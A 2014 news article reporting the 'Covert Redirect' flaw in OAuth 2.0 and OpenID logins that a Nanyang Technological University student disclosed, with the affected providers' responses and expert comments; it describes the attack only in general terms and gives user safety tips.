Nikhil SubramaniamMay 02, 2014 18:28:05 IST
The dust over the Heartbleed flaw has barely settled and there’s more bad news for those using open-source security software to power websites.
This time around the vulnerability affects login using OAuth and OpenID. These standards are used by websites such as Google, Facebook, Microsoft, and LinkedIn, among others to authenticate users.
Discovered by the Wang Jing, a Ph.D student at the Nanyang Technological University in Singapore, the serious vulnerability has been named Covert Redirect. It can pose as a login popup based on an affected site's domain.
For example, you get a seemingly safe which when clicked pops up a Facebook window asking users to authorize the new app using their Facebook credentials. Till here the technique is similar to phishing, but what really makes this a very serious flaw is that instead of using a fake domain name Covert Redirect uses the real site address and information for authentication, but bypasses the server and grabs all the data in the middle.
The information could be accessed by miscreants in such a way includes email addresses, birth dates, contact lists and even credentials to access the entire account. In fact Covert Redirect keeps sending the victim back to compromised links even after the initial request (in this case Facebook authorisation) is performed. This opens them up to more attacks.
Wang says he has already informed Facebook about the flaw, and the company said that it "understood the risks associated with OAuth 2.0," and that fixing this bug would not be accomplished in the short term. According to Wang, Facebook, Google, LinkedIn, Yahoo, Microsoft, PayPal, QQ, Weibo, Taobao, VK.com, Mail.Ru, GitHub are the sites affected so far. The student also reported the flaw to Google, LinkedIn and Microsoft.
Google said that the problem was being tracked, LinkedIn is preparing an announcement to deal with this bud. Microsoft has already investigated the bug and has decided that the vulnerability existed on the domain of a third-party, and not on Microsoft sites.
"Patching this vulnerability is easier said than done. If all the third-party applications strictly adhere to using a whitelist, then there would be no room for attacks," Wang writes in a blog post, explaining the attack in greater details. "However, in the real world, a large number of third-party applications do not do this due to various reasons. This makes the systems based on OAuth 2.0 or OpenID highly vulnerable."
All you can do to avoid this attack is to be careful about the links they clink on and especially those links which redirect you to Google or Facebook, even though it didn’t specify such a redirect. Closing the tab immediately without signing in should prevent any redirection attacks.
Reporting on the vulnerability, CNET spoke to Jeremiah Grossman, founder and CEO at WhiteHat Security, who told the website, "While I can't be 100 percent certain, I could have sworn I've seen a report of a very similar if not identical vulnerability in OAuth. It would appear this issue is essentially a known WONTFIX," Grossman said, adding that any remedies, even though they are hard to come by, will break user experience heavily. "Just another example that Web security is fundamentally broken and the powers that be have little incentive to address the inherent flaws."
Chris Wysopal, CTO at programming code verification firm Veracode further told CNET, "Given the trust users put in Facebook and other major OAuth providers I think it will be easy for attackers to trick people into giving some access to their personal information stored on those service," he said.
Wang says users are in a catch-22 situation, since neither the host company nor the provider is willing to take responsibility in such an attack. Cost is a major factor, as well, since all providers will have to create a whitelist and it will no doubt consume a lot of time.